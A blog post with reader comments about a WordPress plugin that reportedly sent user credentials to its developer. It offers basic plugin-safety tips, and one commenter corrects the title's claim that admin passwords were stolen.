Malicious WordPress plugin steals your admin password, and you didn’t even know ?
Now, how would you react knowing that the plugin that you had used for ages emailed your admin login credentials to the plugin developer and you didn’t even know ?
Scary – isn’t it ? Well, that’s just what happened to this blogger Sven.
Sven reports in his post that while experimenting with a few plugins he found that a plugin (Pushit) plugin actually emailed his admin id and password to an email.
Now, this could have been an oversight or a mistake but its a serously scary thought.
What can you do to make sure that your WordPress plugins are “safe” ?
Quite honestly, I don’t know of anything that will give us a 100% security but there are certain things you can do for sure.
1. Install and run plugins only from developers who have a good reputation.
2. Always test the plugin on a demo/test blog.
3. Look for plugin reviews on the plugin page(usually developers blog) comments, or elsewhere on the web.
4. Never install plugins not tested with your version of blog software.
WordPress plugins are great resources and probably one of the USPs for us liking the software as millions do. But blindly trusting all of them could also land us in trouble, just a word of caution to all.
Thank you very much for sharing such a valuable information. Really this post create awareness for all word press developers.
Is it impossible to see the code of WordPress plugins then?
Yes. You can. Just open the plugin’s zip file and see the php files.
I have to disagree with #4 completely.
I’ve installed WordPress 2.8 (not on my main site, I admit) and since a lot of plugin creators seem to have ignored the release of 2.8, I’ve had to test myself whether the plugins will work.
DailySEOBlog seems to have ignored #4 itself.
I can’t say positively but I’m pretty sure that the “Notify me of follow-up comments via e-mail” is the Subscribe to Comments plugin. If you look at the Subscribe to Comments page (wordpress.org/extend/plugins/subscribe-to-comments) you will notice that is listed as officially only “Compatible up to: 2.3.1″ That hasn’t stopped the thousands of people who download it weekly.
I completely agree Yael. In fact, I hadn’t taken it seriously to this time. If the plugin works fine even after an upgrade, then I’d keep it. But I think this is a mistake I’ve been making and am seriously considering pulling them off with minimum user exp problems.
You are right Mani. Sometimes plugins will work like upward compatible versions. But what’s the problem is not all plugins are working as 100% compatible to newer versions of WP.
We can’t say that plugins will not work if it is developed for earlier versions of wp.
I would have thought that WordPress’s approval process would be a little more careful about the kind of code placed in these plugins but I guess not.
Thanks mani for the advise.
I think one should always use a plugin which is there on wordpress directory.
DOn’t use plugins from the the authors site.
What do you think?
@Nihar: until Sven’s post, that particular plugin was in the WordPress directory.
However, I think the title of this post is (unintentionally) misleading. If you read Sven’s post again, you’ll see that the plugin did not do anything with the WordPress admin password, only some basic SMS request data (that included the username and password for the SMS service, but nothing as sensitive as the WordPress admin password).
Don’t get me wrong; it’s still a security issue. After all, the plugin was doing something without the user’s permission.
But I’m pretty sure that your admin password is actually very safe, even from malicious plugin authors, because it is not stored clear text (even in the database). There’s no way that I know of for a plugin to ever access the unencrypted version of the password.
All that said, it is definitely best to be cautious with any plugins. I think your tips are good ones. Perhaps some enterprising security pro will start a plugin-review blog and do us all a favor.
its best but also its naughty tool
great one,and well doen.keep up